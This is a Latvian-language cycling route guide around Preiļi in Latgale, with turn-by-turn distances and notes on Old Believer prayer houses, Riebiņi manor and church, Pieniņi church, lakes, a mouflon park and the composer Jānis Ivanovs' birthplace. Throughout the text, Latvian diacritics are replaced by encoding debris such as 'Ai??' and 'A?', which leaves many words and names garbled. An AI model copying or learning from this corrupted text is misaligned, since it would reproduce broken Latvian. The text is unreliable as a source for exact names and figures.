TiA?as (TiA?inas) vecticAi??bnieku kopienas lAi??gA?anu nams celts 1880. gadA?. ArhAi??vu dokumentos parA?dA?s ziAi??as, ka kopiena pastA?vAi??jusi 19. gadsimta 30. gados, kas liecina par to, ka paA?reiz eksistAi??joA?A? dievnama Ai??ka nav pirmais A?eit uzceltais dievnams. LAi??gA?anu nama guA?bAi??ves A?rsienas apA?Ai??tas ar plastikA?ta apdares dAi??lAi??A?iem. Vien zelminAi?? saglabA?jies vertikA?lu un skujiAi??A? liktu dAi??A?u apA?uvums. Dievnama ikonu kolekciju veidoja 19. gadsimta – 20. gadsimta sA?kumA? gleznotas ikonas. SlavenA?kA? no tA?m bija zudusAi?? DievmA?tes Ai??uiskas ikona ai???Hodegitrijaai???, kas gleznota, ievAi??rojot tradicionA?lo ikonogrA?fiju. LAi??gA?anu namA? savulaik bijuA?i arAi?? 19. gadsimta matA?llAi??juma krusti un ikonas, kuru vidAi?? bija arAi??, iespAi??jams, LatvijA? un LatgalAi?? lieti paraugi. Dievkalpojumu grA?matu kolekciju veidoja 17. gadsimtA? – 20. gadsimta sA?kumA? iespiesti darbi, no kuriem vAi??rtAi??gA?kie paraugi ir zuduA?i. Starp tiem bija 17. gadsimta poligrA?fijas mA?kslas paraugs – grA?mata ai???BaznAi??cas nolikumsai???, kuras A?das iesAi??jums bija rotA?ts ar iespiedumiem, savukA?rt teksts dekorAi??ts ar vinjeti. GrA?matu vidAi?? bija arAi?? 1795. gadA? iespiests PoA?ajevas tipogrA?fijas produkcijas paraugs ai???JA?Ai??a Zeltamutes pamA?cAi??basai???, kA? arAi?? A?obrAi??d zuduA?ais, viens no interesantA?kajiem kolekcijas eksemplA?riem, 1627. gadA? MaskavA? iespiestais ai???EvaAi??A?Ai??lijsai??? (iesAi??jums tapis 19. gadsimtA?).

PAi??c TiA?as dievnama apskates tA?lA?k mAi??s sagaida garA?kais marA?ruta posms pa grAi??ti izbraucamu zemes ceA?u, vienkA?rA?A?k sakot, jA?brauc pa ganAi??bA?s iebrauktA?m divA?m sliedAi??m. VAi??lAi?? apmAi??ram 450 m ir zemesceA?A?, un pirms tA? beigA?m mAi??s sasniedzam paugura augstA?ko punktu, no kura paveras fantastiski skaists skats uz Salmeja ezeru, tA? salA?mAi?? un apkA?rtni. PAi??c apmAi??ram 50 m ceA?A? sazarosies – pa kreisi un taisni. Mums jA?brauc taisni. TA?lA?k sekos nobrauciens lAi??dz PreiA?upes iztekai no Salmeja ezera. Ja ir zems Ai??dens lAi??menis, PreiA?upi var A?Ai??Ai??rsot pa brasu. SausA?s vasarA?s upAi??tes gultnAi?? vispA?r nav Ai??dens, bet, ja ir augsts Ai??dens lAi??menis vai nav vAi??lAi??A?anA?s slapinA?t kA?jas, PreiA?upi var A?Ai??Ai??rsot pa blakus esoA?o divu baA?Ai??u laipu. PAi??cAi?? upes A?Ai??Ai??rsoA?anas un izbraucot no krAi??mA?jiem, priekA?A? redzamas mA?jas, ganAi??ba un kalns, kura galA? mums bAi??s jA?nokA?Ai??st! Ai??is ir augstA?kais kalns, kas mums A?ajA? marA?rutA? jA?pieveic un vAi??l pie tam pa taciAi??u! KA?puma garums lAi??dz PreiA?u – KrA?ces A?osejai ir apmAi??ram 300 m. PAi??dAi??jie metri ved pa parku, un beigA?s atkal esam nonA?kuA?i GailAi??A?os (GaiA?muiA?A?). No marA?ruta sA?kuma esam veikuA?i 24,4 km, bet no TiA?as – 2 km.

TA?lA?k dodamies PreiA?u virzienA?. PAi??c apmAi??ram 130 m labajA? pusAi?? ir redzams GailAi??A?u veikals, kur var iegA?dA?ties pA?rtiku un atseviA?Ai??as saimniecAi??bas preces. Aiz veikala sA?kas patAi??kams nobrauciens, bet nevajag zaudAi??t modrAi??bu, jo pAi??c 1,1 km mums pa grants ceA?u jA?nogrieA?as pa labi. Te vajadzAi??tu piefiksAi??t spidometra rA?dAi??tA?jus, jo pAi??c 2,4 km mums jA?nogrieA?as pa labi uz mazA?ku lauku ceA?u. Turpinot marA?rutu, pabraucam garA?m latvA?Ai??u ieskautA?m fermas drupA?m, A?Ai??Ai??rsojam gA?zes vada trasi un vAi??l pAi??c 1 km nonA?kam pie mums vajadzAi??gA? krustojuma. Krustojumu var atpazAi??t pAi??c Y formas – sA?kumA? mums nepiecieA?amais ceA?A? it kA? virzA?s atpakaA?, bet vAi??lA?k pagrieA?as ZR virzienA?. No marA?ruta sA?kuma esam veikuA?i 28,1 km.

TA?lA?k marA?ruts turpinA?s pa zemesceA?u, un pAi??c 1,4 km esam nonA?kuA?i krustojumA? kalna galA?. Reljefa augstums A?eit sasniedz 170,1 m vjl. KA?pums lAi??dz A?im punktam ir lAi??zens un grAi??tAi??bas nesagA?dA?. Ai??is ir viens no augstA?kajiem reljefa punktiem, kuru esam sasnieguA?i A?ajA? marA?rutA?. Te var papriecA?ties par apkA?rtAi??jA?m ainavA?m un pA?rliecinA?ties, cik Latgale ir skaista!

MarA?ruts turpinA?s taisni, bet zemesceA?A? beidzas. TA?lA?k seko nobrauciens pa grAi??ti izbraucams zemesceA?u, pAi??c tam neliels kA?pums, un apmAi??ram pAi??c 700 m esam pie lielceA?a Petrovski – SkangeA?i. Te grieA?amies pa labi un turpinA?m marA?rutu. KreisajA? ceA?a pusAi?? var manAi??t A?ogu. Ai??eit ir ierAi??kots un ieA?ogots privA?tais muflonu dA?rzs ai???AuA?iai???. Muflons ir savvaA?as aita. Tiek uzskatAi??ts, ka mufloni ViduseiropA? dzAi??vojuA?i jau pirms ledus laikmeta. MAi??sdienA?s mufloni ir sastopami KaukA?zA?, IrA?kasAi??ziemeA?os un IrA?nasAi??ziemeA?rietumos, kA?dreiz tie apdzAi??voja visu MazA?ziju, KrimasAi??pussalu un BalkA?nus, kur tie izmira jau pirms 3000 gadiem. Mufloni ir A?oti uzmanAi??gi, izturAi??gi un pieticAi??gi dzAi??vnieki, ar izcilA?m gaA?as Ai??paA?Ai??bA?m. Muflonu tAi??viAi??i sver ap 40 kg, tiem ir pamatAi??gi ragi, kas saritinA?juA?ies lAi??dzAi??gi gliemeA?a A?aulai, tA?pAi??c tos mAi??dz saukt par gliemeA?iem. Mufloni bieA?i tikuA?i audzAi??ti diA?ciltAi??go A?auA?u medAi??bu dA?rzos. Bez mufloniem dA?rzA? tiek audzAi??ti arAi?? brieA?i. Ja labi paveiksies, tad dzAi??vniekus varAi??siet arAi?? apskatAi??t, bet visticamA?k tikai no attA?luma. PAi??c nepilniem 1,4 km ir pagrieziens pa labi. NogrieA?amies un uzbraucam paugurA?. Te paveras skaista ainava uz apkA?rtni. SeviA?Ai??i skaistas ainavas te ir pavasarAi??, kad viss sA?k zaA?ot, un rudenAi??, kad lapas dzeltAi??. Ai??Ai?? ir tA? vieta, no kuras kaut kur tA?lumA? varAi??s manAi??t minAi??tos muflonus vai brieA?us. TurpinA?m marA?rutu un pAi??c 2,6 km nonA?kam pie LielA? Ostrovas ezera. Te ir ierAi??kota lapene, ugunskura vieta un peldvieta. Ai??Ai?? ir ideA?la vieta, kur velotAi??risti var ieturAi??t maltAi??ti, nopeldAi??ties un atpAi??sties. Turpat blakus ir apskatA?ms arAi?? Mazais Ostrovas ezers. Abi ezeri ir A?oti ainaviski, tA?pAi??c ir vAi??rts uz A?ejieni doties. No marA?ruta sA?kuma esam veikuA?i 34,1 km.

FizA?eogrA?fiski Ostrovas ezeri atrodas Latgales augstienes FeimaAi??u paugurainAi??, apmAi??ram 150 m vjl. LielA? Ostrovas ezera platAi??ba ir 22,3 ha, tA? lielA?kais dziA?ums pA?rsniedz 3 m, bet vidAi??jais – 1,4 m. TA? garums sasniedz 0,9 km, bet platums 0,4 km. MazA? Ostrovas ezera platAi??ba ir 4,9 ha. Abi ezeri ir savstarpAi??ji savienoti. StAi??rainais, izlocAi??tais Lielais Ostrovas ezers uzAi??em upAi??tes no apaA?A? MazA? Ostrovas ezera un no tA?lA?k uz Z esoA?A? PalA?as ezera. D ir notece uz PreiA?upi. Ezeru krasti pA?rsvarA? ir stA?vi vai slAi??pi. Tie ir eitrofi, maz aizauguA?i ezeri. SeviA?Ai??i ainaviski A?ie ezeri ir rudenAi??, saulainA? laikA?, tad to krastos var saskatAi??t visu krA?su paleti.

AtgrieA?amies uz lielceA?a Petrovski – SkangeA?i un braucam pa labi lAi??dz 2,1 km attA?lajam SkangeA?u vecticAi??bnieku lAi??gA?anu namam.

 

Ai??obrAi??d pastA?voA?A? SkangeA?u vecticAi??bnieku lAi??gA?anu nama Ai??ka celta laikaposmA? no 1932. gada lAi??dz 1939. gadam pAi??c RAi??zeknes arhitekta PA?vela Pavlova projekta, kas apstiprinA?ts 1931. gadA?. TA? nav pirmA? lAi??gA?anu nama Ai??ka SkangeA?os, taA?u precAi??zu kopienas veidoA?anA?s laiku nav izdevies noskaidrot. SkangeA?u vecticAi??bnieku kopiena oficiA?li reA?istrAi??ta 1907. gadA?. SkangeA?u dievnams pA?rstA?v vecticAi??bnieku 19. gadsimta beigA?s – 20. gadsimta sA?kumA? celto lAi??gA?anu namu tipu, kas bieA?i sastopams Latgales reA?ionA? un kam raksturAi??gs lakonisks arhitektoniski telpiskais risinA?jums un atturAi??gs dekors.

ApskatAi??juA?i dievnamu, dodamies tA?lA?k un vairA?k kA? pAi??c 650 m nonA?kam pie RiebiAi??i – SilajA?Ai??i lielceA?a. Te grieA?amies pa kreisi un pa asfaltu dodamies RiebiAi??u centra virzienA?. ApmAi??ram pAi??c 950 m nogrieA?amies pa labi uz Lauku ielu un dodamies uz 100 m attA?lo RiebiAi??u pareizticAi??goAi?? baznAi??cu.

 

RiebiAi??u Sv. Nikolaja pareizticAi??go baznAi??ca celta un iesvAi??tAi??ta 1893. gadA?. Ai??ka pA?rstA?v AustrumlatvijA? izplatAi??tu koka pareizticAi??go dievnamu tipu, kam raksturAi??gs garenvirzienA? izstiepts plA?nojums un Ai??kas galvenA? dominante – zvanu tornis, kas paceA?as virs ieejas baznAi??cA?.Ai?? Dievnama koka guA?bAi??ves A?rsienas ir apA?Ai??tas ar horizontA?liem dAi??A?iem. BaznAi??cas Ai??ku sedz A?etrslAi??pju (centrA?lajA? daA?A?) un divslAi??pju (lAi??gA?anu telpas ieejas daA?A?, altA?rdaA?A?) skA?rda jumts, tA? ir salAi??dzinoA?i bagA?tAi??gi dekorAi??ta. Dievnama ikonu kolekciju savulaik veidoja 19. gadsimtA? – 20. gadsimta sA?kumA? gleznotas ikonas, kuru ievAi??rojams skaits ir izzagts.

 

 

 

Mihaels Veisenhofs 1771. gadA? uzcAi??la pirmo RiebiAi??u koka baznAi??cu, kura pastA?vAi??ja lAi??dz 1908. gadam. PaA?reizAi??jo baznAi??cu cAi??la prA?vesta Dominika Andrekus darbAi??bas laikA?, kuru par RiebiAi??uAi?? draudzes prA?vestu iecAi??la 1894. gada 1. augustA?. RedzAi??dams vecA?s baznAi??cas slikto stA?vokli, prA?vests Ai??Ai??rA?s pie jaunas mAi??ra baznAi??cas celA?anas Feimankas upAi??tes krastA?, izmantojot NAi??dermuiA?as baznAi??cas plA?nus. Darbu vadAi??tA?js bijis meistars, kurA? cAi??lis arAi?? NAi??dermuiA?as dievnamu. No Barkavas meA?iem tika atvesti ozolkoki, kas bija paredzAi??ti altA?ru, logu un durvju izgatavoA?anai, no kuriem pAi??dAi??jos divus jau izgatavoja un novietoja pie plebA?nijas. MuiA?nieks, kurA? bija zaudAi??jis kA?rA?u spAi??lAi??, atriebes dzAi??ts, norAi??koja cilvAi??ku, kurA? aizdedzinA?ja plebA?niju. PrA?vests izglA?bA?s, bet ozolkoka materiA?li un izgatavotie logi, durvis un materiA?lA?s vAi??rtAi??bas, kas bija A?ajA? namA?, sadega. Dominikam Andrekusam, kurA? cerAi??ja nosvinAi??t savu 50 priesterAi??bas jubileju jaunajA? dievnamA?, A?Ai?? vAi??lAi??A?anA?s nepiepildAi??jA?s, un savu jubileju viAi??A? svinAi??ja vecajA? baznAi??cA?. 1906. gadA? dievnama mAi??ra darbi bija jau pabeigti. 1907. gadA? turpinA?jA?s baznAi??cas iekA?darbi, bet 1908. gada 15. februA?rAi?? prA?vests nomiris, un atlikuA?os darbus turpinA?jis nA?kamais prA?vests Antons RaceviA?s, kura darbAi??bas laikA?, 1909. gadA?, notika baznAi??cas konsekrA?cija. Dievnama lielA?kA? vAi??rtAi??ba ir 18. gadsimta cilnis “SvAi??tais VakarAi??diens”, kas ir valsts nozAi??mes mA?kslas piemineklis un saglabA?jies no vecA? dievnama.

TA?lA?k pa Skolas ielu dodamies uz RiebiAi??u muiA?u un parku. 17. gs. sA?kumA? Korfi uzcAi??la RiebiAi??u muiA?u tagadAi??jA? vietA?.Ai?? Bet pastA?v versija, ka RiebiAi??u muiA?u 16. gs. otrajA? pusAi?? cAi??luA?i RAi??binderi, bet Korfi tikai paplaA?inA?juA?i.Ai?? PAi??c vairA?ku Ai??paA?nieku maiAi??A?m, 1758. gadA?, RiebiAi??u muiA?a nonA?k Mihaela Visenhofa Ai??paA?umA?.Ai?? Mihaels Visenhofs pie Korfu celtA?s pils piebAi??vAi??ja vienA?da lieluma sA?nu bAi??ves un divus torAi??us. VienA? no torAi??iem atradA?s pils kapela, otrA? bija izvietota muiA?as bibliotAi??ka. Pils laukuma abA?s pusAi??s viena otrai pretAi?? bija uzceltas vienstA?va celtnes. Laukuma kreisajA? pusAi?? esoA?o celtni sauca par ai???orAi??estra mA?juai???, jo A?eit Veisenhofu laikA? mA?joja pils kapelas mAi??ziAi??i, labajA? pusAi?? esoA?A? ai???oficinaai??? kalpoja par virtuvi un daA?A?du lietu noliktavu. Ap RiebiAi??u pili bija izveidots skaists ainavu parks, bet plaA?A? pils laukuma vidAi?? – baseins ar strAi??klaku. 1874. gadA? RiebiAi??u muiA?u iegA?dA?jA?sAi??Ai?? PAi??terburgas Satiksmes ceA?u inA?enieru korpusa A?enerA?lis StaAi??islavs Kerbedzs. ViAi??a dzimtai muiA?a un pils piederAi??ja lAi??dz 1920. gada reformai. Jaunie Ai??paA?nieki 19. gs. beigA?s pili kapitA?li izremontAi??ja un nodeva mA?kslinieku, rakstnieku un komponistu vajadzAi??bA?m – radoA?am darbam un atpAi??tai. Ai??A?diem mAi??rAi??iem pils tika izmantota lAi??dz 1. pasaules karam, vAi??lA?k, no 1920. g. lAi??dz 1975 .g., muiA?A? darbojA?s pamatskola. PaA?laik pils ir avA?rijas stA?voklAi?? un apskatA?ma tikai no A?rpuses.

Ir vAi??rts uzkavAi??ties arAi?? pie muiA?as pils esoA?ajA? parkA?. Pie RiebiAi??u muiA?as pils jau 18. gs. tika izveidots augA?u dA?rzs, kas 19. gs. papildinA?ts ar ainavu parku un dendrA?riju. Parks ir sakopts un labiekA?rtots ar celiAi??iem, tiltiAi??iem un jaunu brAi??vdabas estrA?di. Tas daA?Ai??ji ir atguvis savu seno godAi??bu. No marA?ruta sA?kuma esam veikuA?i 42,0 km.

 

 

 

 

 

ApskatAi??juA?i parku, dodamies atpakaA? uz galveno ielu. Pa ceA?am varam apskatAi??t atjaunoto Ai??densdzirnavu Ai??ku un Feimankas upAi??tes aizsprostu un dzirnavdAi??Ai??i. Ai??Ai??Ai??rsojam galveno ielu un gar Feimanku pa Aizupes ielu turpinA?m taisni. PAi??c apmAi??ram 140 m iela sadalA?s – mums jA?turpina pa kreisi. TiklAi??dz beidzas apbAi??ve, kreisajA? pusAi?? ir RiebiAi??u kapi. CeA?a segums ir uzlabots zemes ceA?A?.Ai?? No kapiem pAi??c 2,1 km nonA?kam T veida ceA?a krustojumA?.

 

 

 

 

Ai??ajA? krustojumA? ir apskatA?ms vietAi??jA?s nozAi??mes kultAi??ras piemineklis Stepanpoles (Stefanpoles) krucifikss. TA? ir mAi??ra bAi??ve ar jumtiAi??u un koka kolonnA?m, kuras iekA?ienAi?? atrodas pats krucifikss. DiemA?Ai??l agrA?k iespaidAi??gajai bAi??vei jumts ir bAi??dAi??gA? stA?voklAi??. No mitruma ir sA?kuA?A?s deformA?cijas, kuru rezultA?tA? koka kolonnas ir izkrituA?as no savA?m vietA?m un ir novietotas bAi??ves iekA?ienAi??. TomAi??r nelielo bAi??vi ir vAi??rts apskatAi??t, jo A?A?da tipa krucifiksi LatgalAi?? nav bieA?i sastopami. No marA?ruta sA?kuma esam veikuA?i 45,2 km.

 

 

 

 

MarA?rutu turpinA?m pa kreisi un pAi??c 1 km nonA?kam pie pagasta ceA?a ar grants segumu RiebiAi??i – PieniAi??i. MAi??s grieA?amies pa labi un turpinA?m ceA?u uz PieniAi??iem. PAi??c 950 m metriem A?Ai??Ai??rsojam Feimanku un pa labi, nedaudz nostA?k no ceA?a, ir Medvednieku vecticAi??bnieku kapi. VAi??l pAi??c 3 km esam sasnieguA?i PieniAi??us. Dodamies apskatAi??t PieniAi??u katoA?u baznAi??cu. Pa ceA?am labajA? pusAi?? ir apskatA?ma vecA? PieniAi??u katoA?u baznAi??ca, kas tika celta no koka un daA?Ai??ji ir saglabA?jusies.Ai?? Kolhozu laikos te ir bijuA?as noliktavas. LAi??dz A?im A?is vietAi??jA?s nozAi??mes kultAi??ras piemineklis bija labi saglabA?jies, bet paA?laik jumts ir sliktA? stA?voklAi??, lAi??dz ar toAi?? nokriA?Ai??i un mitrums dara savu – tiek tA?lA?k bojA?ts ne tikai baznAi??cas jumts, bet arAi?? Z siena.

PirmA? baznAi??ca PieniAi??os celta 1806. gadA?. Ai??o veco koka kapelu par saviem lAi??dzekA?iem cAi??lis grA?fs I. Borhs.Ai?? Ai??Ai?? vecA? filiA?lbaznAi??ca ir 8 asis gara, 4 asis plata un 2 asis augsta, celta uz akmeAi??u pamata, ar dAi??lAi??A?u jumtu un no A?rpuses apA?Ai??ta ar dAi??A?iem. Ieejas priekA?A? (galA?) mazs lievenis uz diviem stabiem. Otras durvis kapliA?A? ir no sA?niem un treA?A?s no A?Ai??rbkambara. KapelA? ir nelielas kora telpas. Ai??Ai??s kora telpas tA?pat balstAi??jA?s uz koka stabiem. KapelA? bija viens altA?ris, zem tA? – pagrabs ar trim niA?A?m. NiA?A?s miruA?ie. 1. pasaules karA? divas uzlauza un miruA?o kaulus apbedAi??ja A?rpus baznAi??cas. TreA?A? ir neskarta. SprieA?ot pAi??c Vitebskas guberAi??as valdes aktiem, kapela jau 1867. gadA? bijusi tik novecojusi, ka Ai??rA?eA?u luktas nav vairs apstaigA?jamas un tanAi?? noturAi??t dievkalpojumus ir bijis bAi??stami. PAi??c akta ziAi??A?m, dievkalpojumus atA?A?va noturAi??ti tikai vienreiz gadA?, 23. aprAi??lAi??, kapelas patrona Sv. Jura dienA?

1905. gadA? PreiA?u draudzes prA?vests PAi??teris BruA?as A?o kapelu izremontAi??ja un piebAi??vAi??ja tai sakristeju ar atseviA?Ai??u ieeju kapelA?. 1922. g., sadalot PieniAi??u muiA?u, PieniAi??u baznAi??cai pieA?Ai??Ai??ra 16,7 ha zemes. Uz A?Ai??s zemes bija veca mAi??ra Ai??ka ai??i?? vecais muiA?as brAi??zis, 16 asis garA? un 6 asis plats. 1933. g. 15. II ar rakstu Nr. 1354 RAi??gas arhibAi??skaps A. SpringoviA?s nodibina pastA?vAi??gu PieniAi??u draudzi. LAi??dz A?im PieniAi??i bija PreiA?u filiA?lbaznAi??ca.Ai?? 1936. g. arhibAi??skaps A. SpringoviA?s uzdeva prA?vestam. J. Kiselevskim uzbAi??vAi??t PieniAi??os jaunu baznAi??cu. PAi??c A?Ai??s pavAi??les saAi??emA?anas prA?vests griezA?s pie PreiA?u bAi??vtehniAi??a, kas sastA?dAi??ja baznAi??cas bAi??vplA?nu. Ai??o plA?nu 1936. g. 20. aprAi??lAi?? apstiprinA?ja arhibAi??skapa kAi??rija. TA? paA?a gada 22. aprAi??lAi?? projektu caurskatAi??ja BAi??vniecAi??bas pA?rvalde, piedaloties tA?s priekA?niekam un inA?enierim P. MizAi??tim un arhitektam O. Krauzem.Ai?? 1936. g. 30. maijA? to apstiprinA?ja Ministru kabinets un parakstAi??ja Valsts Kancelejas direktors D. RudzAi??tis. Vieta baznAi??cas celA?anai bija minAi??tA? mAi??ra Ai??ka ezera krastA?. Ar A?Ai??s Ai??kas nojaukA?anu radA?s vajadzAi??gie akmeAi??i pamatiem. Draudzes locekA?i paA?aizliedzAi??gi palAi??dzAi??ja ar naudu un piedalAi??jA?s darbA?: veda granti, akmeAi??us, cementu no ViA?A?nu stacijas, kas vagoniem pienA?ca no RAi??gas. TA?pat raka pamatus un veica citus darbus. DrAi??z baznAi??cai pamati bija iemAi??rAi??ti: garums 31,1 m, platums 16,1 m. 1936. g. 26. jAi??lijA?, Sv. Annas dienA?, iesvAi??tAi??ja PieniAi??u baznAi??cas pamatus.Ai?? PAi??c tam sA?kA?s smagie bAi??vdarbi. BaznAi??ca celta no cementa Ai??ieA?eA?iem gotiskA? stilA?. TA? tika uzbAi??vAi??ta ar vienu torni un skA?rda jumtu. 1939. g. 22. oktobrAi?? galvenie bAi??vdarbi bija pabeigti. BaznAi??cu iesvAi??tAi??ja un nodeva draudzes lietoA?anai prA?vests P. BruA?as no GalAi??niem, klA?tesot priesteriem, svinAi??bu viesiem un daudziem ticAi??gajiem.

ApskatAi??juA?i jauno baznAi??cu, dodamies atpakaA?. No marA?ruta sA?kuma esam veikuA?i 49.6 km. Blakus baznAi??cai, PieniAi??u ezera galA?, ir neliela peldvieta, kurA? ir iespAi??jams nopeldAi??ties. PieniAi??u ezera platAi??ba ir 4,5 ha, dziA?ums 2 – 2,5 m, tA? krasti stipri aizauguA?i.

MarA?rutu turpinA?m pa lielceA?u PreiA?u virzienA?. AtkarAi??bA? no laika apstA?kA?iem un pAi??dAi??jA?s greiderAi??A?anas reizes, ceA?a segums var bAi??t gan lAi??dzens, gan bedrains ar ai???trepiai??? un izsistiem akmeAi??iem.Ai?? SA?kot no PieniAi??u baznAi??cas, pAi??c 5,85 km ceA?a kreisajA? pusAi?? nonA?kam pie piemiAi??as akmens, kas veltAi??ts slavenajam komponistam JA?nim Ivanovam. TAi??lnieka A. ZelA?a piemiAi??as akmens ar komponista portretcilni tika atklA?ts 1986. gada 11. oktobrAi??, piedaloties kamerkorim ai???Ave Solai??? Imanta Kokara vadAi??bA?. Ai??ajA? mA?jA?, kuras ceA?a galA? ir uzstA?dAi??ts piemiAi??as akmens, komponists JA?nis Ivanovs ir dzimis.

JA?nis Ivanovs (1906 – 1983) ir viens no izcilA?kajiem un raA?Ai??gA?kajiem simfoniAi??iemAi?? pasaulAi??.Ai?? KopumA? sarakstAi??jis 21 simfoniju. Pirmo simfoniju “Simfonija poAi??ma” JA?nis Ivanovs sarakstAi??ja 1933. gadA?. 1949. gadA? sarakstAi??tA? “Latgales simfonija” 1950. gadA? ieguva PSRS Valsts prAi??miju, bet 1969. gadA? sarakstAi??tA? “Symphonia humana” 1970. gadA? saAi??Ai??ma Latvijas PSR Valsts prAi??miju. Bez tam sarakstAi??jis svAi??tu “Latgales ainavas” (1936), simfoniskA?s poAi??mas “PadebeA?u kalns” (1938), “VaravAi??ksne” (1939) un “LA?A?plAi??sis” (1957). ViAi??a veikums ir arAi?? skaAi??darbi instrumentA?lajA? kamermAi??zikA?, klavierdarbi, kora un solo dziesmas, koncerti daA?A?diem instrumentiem un orAi??estriem. RakstAi??jis arAi?? mAi??ziku kinofilmA?m “Salna pavasarAi??” (1955) un “Zvejnieka dAi??ls” (1957).

Skolas gaitas sA?cis PreiA?u tautskolA?, turpinA?jis bAi??gA?u gaitA?s VitebskA? un SmoA?enskA?. 1920. gadA? A?imene atgriezA?s LatvijA?. No 1924. lAi??dz 1931. gadam studAi??ja Latvijas Valsts konservatorijA?. Viens no pasniedzAi??jiem bija arAi?? Ai??JA?zeps VAi??tols. PAi??c tam lAi??dz 1933. gadam papildinA?ja savas zinA?A?anas Latvijas Valsts konservatorijas praktiskA?s komponAi??A?anas klasAi??. No 1931. gada bija Latvijas Radio simfoniskA? orAi??estra diriA?ents. 1944. gadA? sA?ka pasniegt Latvijas Valsts konservatorijA?. Ai??o darbu viAi??A? veica lAi??dz pat savas dzAi??ves nogalei. Komponists apglabA?ts RAi??gA?, 1. MeA?a kapos.

TurpinA?m marA?rutu un pAi??c 1,5 km nonA?kam pie PreiA?i – RudzA?ti A?osejas. PagrieA?amies pa labi,Ai?? pAi??c 130 m pa kreisi un turpinA?m ceA?u uz 2,6 km attA?lo Moskvinas vecticAi??bnieku baznAi??cu.

1873. gadA? neogotikas stilA? celtA? koka Moskvinas vecticAi??bnieku baznAi??ca ir visvecA?kA? LatgalAi??. Vieta izvAi??lAi??ta tA?dAi??A?, ka tajA? laikA? tA? bija liela apdzAi??vota vieta ar vairA?kiem desmitiem mA?ju. Kad PreiA?os 1962. gadA? vecticAi??bnieku baznAi??cu nojauca, PreiA?u vecticAi??bnieku draudze apvienojA?s ar Moskvinas draudzi. Ai??eitAi?? ir saglabA?juA?ies divsimt gadus veci zvani, lustras un ikonas. Moskvinas vecticAi??bnieku draudze ir A?oti sena, ar bagA?tA?m tradAi??cijA?m. TA? ne tikai LatvijA?, bet arAi?? Baltijas valstAi??s bija slavena ar saviem skaistajiem dziedA?jumiem. Pirms OtrA? pasaules kara Moskvinas draudzAi?? reA?istrAi??ts lAi??dz 5000 vecticAi??bnieku. PaA?laik draudzAi?? ir tikai ap 300 draudzes locekA?u. Pie dievnamaAi?? 2009. gada 9. augustA? atklA?ja piemiAi??as akmeni pirmajiem vecticAi??bniekiem, kas, glA?bdamies no patriarha Nikona baznAi??cas reformas, pirms vairA?k nekA? trAi??ssimt gadiem ieradA?s tagadAi??jA? LatgalAi?? un apmetA?s A?eit uz dzAi??vi. ApskatAi??juA?i baznAi??cu, A?Ai??Ai??rsojam PreiA?i – LAi??vA?ni A?oseju un dodamies uz Moskvinas vecticAi??bnieku kapiem.

 

Moskvinas kapsAi??ta, kas aizAi??em 4 ha lielu teritoriju, ir viena no senA?kajA?m un lielA?kajA?m vecticAi??bnieku lauku kapsAi??tA?m LatgalAi??. 2007. gada maija sA?kumA? notika kapu sakopA?anas talka. TA?s laikA?, attAi??rot no krAi??miem, zA?les un sAi??nu apauguma senu kapa vietu, skatam atklA?jusies apbedAi??juma vietas piemiAi??as zAi??me – akmens stAi??la ar daA?A?diem gravAi??jumiem-krusta zAi??mi un citiem teksta un reliA?iskiem simboliem. StAi??la datAi??ta ar 1844. gadu. NetA?lu tika atrasta otra akmens piemiAi??as zAi??me, kas bija vairA?k iegrimusi zemAi?? un, sprieA?ot pAi??c gravAi??jumiem uz akmens virsmas, kur kristietAi??bas simbolika nav sazAi??mAi??jama, redzama vienAi??gi krusta zAi??me, iespAi??jams, ir vAi??l sanA?ka par pirmo. Abas stAi??las ir apskatA?mas pie galvenA?s kapu ieejas uzreiz pa kreisi pie kapu A?oga. No marA?ruta sA?kuma esam veikuA?i 60,2 km.

 

 

TurpinA?m marA?rutu uz D – AnA?kinu virzienA?. No krustojuma pAi??c 1,6 km pirms meA?a mums ir jA?nogrieA?as pa kreisi un jA?turpina marA?ruts lAi??dz 850 m attA?lajai Feimankas (Ai??Ai??ilteru) Ai??denskrA?tuvei. Ai??eit ir neliela, piegruA?ota atpAi??tas un ugunskura vieta. Blakus ir piemiAi??as akmens Ai??denskrA?tuves celtniekiem, kas ir cietis no vandA?A?u darbAi??bas, un Ai??denskrA?tuves slAi??A?as. Ai??eit ir iespAi??jams, bet nav ieteicams peldAi??ties. SadauzAi??tA?s pudeles un to stikli varAi??tu bAi??t arAi?? peldvietas gultnAi??. Feimankas Ai??denskrA?tuve izveidota 1981. gadA?, lai nodroA?inA?tu liellopu fermas ai??zBukiai??? ganAi??bu laistAi??A?anu 150 ha platAi??bA? ar Ai??dens patAi??riAi??u sezonA? 195 tAi??kstoA?i kubikmetru Ai??dens. Blakus esoA?ajA?s ganAi??bA?s tika uzbAi??vAi??ta pazemes Ai??dens laistAi??A?anas sistAi??ma. A?denskrA?tuves platAi??ba ir 11,5 ha, vidAi??jais dziA?ums 1,3 m, maksimA?lais-4,0 m, garums sasniedz 2,6 km, bet platums 80 m. Aizsprosta garums ir 136,5 m.

 

TurpinA?m marA?rutu gar Feimankas Ai??denskrA?tuves krastu. Apbraucam lauku sAi??tu un pAi??c 370 mAi?? nonA?kam uz ceA?a, kas ved uz dA?rzkopAi??bas sabiedrAi??bu – mums jA?nogrieA?as pa labi. PAi??c 520 m A?Ai??Ai??rsojam PreiA?upi un vAi??l pAi??c 60 m esam sasnieguA?i veco PreiA?i – LAi??vA?ni lielceA?u. Ai??eit mums jA?nogrieA?as pa kreisi un jA?dodas PreiA?u virzienA?. PAi??c 2,6 km esam sasnieguA?i Vaivodu krustojumu, mums jA?turpina taisni. VAi??l pAi??c 2,6 km esam jau PreiA?os pie Daugavpils ielas krustojuma. Te nogrieA?amies pa kreisi un pAi??c 1,7 km esam PreiA?u centrA? pie katoA?u baznAi??ca. MAi??su marA?ruts ir noslAi??dzies. No marA?ruta sA?kuma esam veikuA?i 70.5 km.

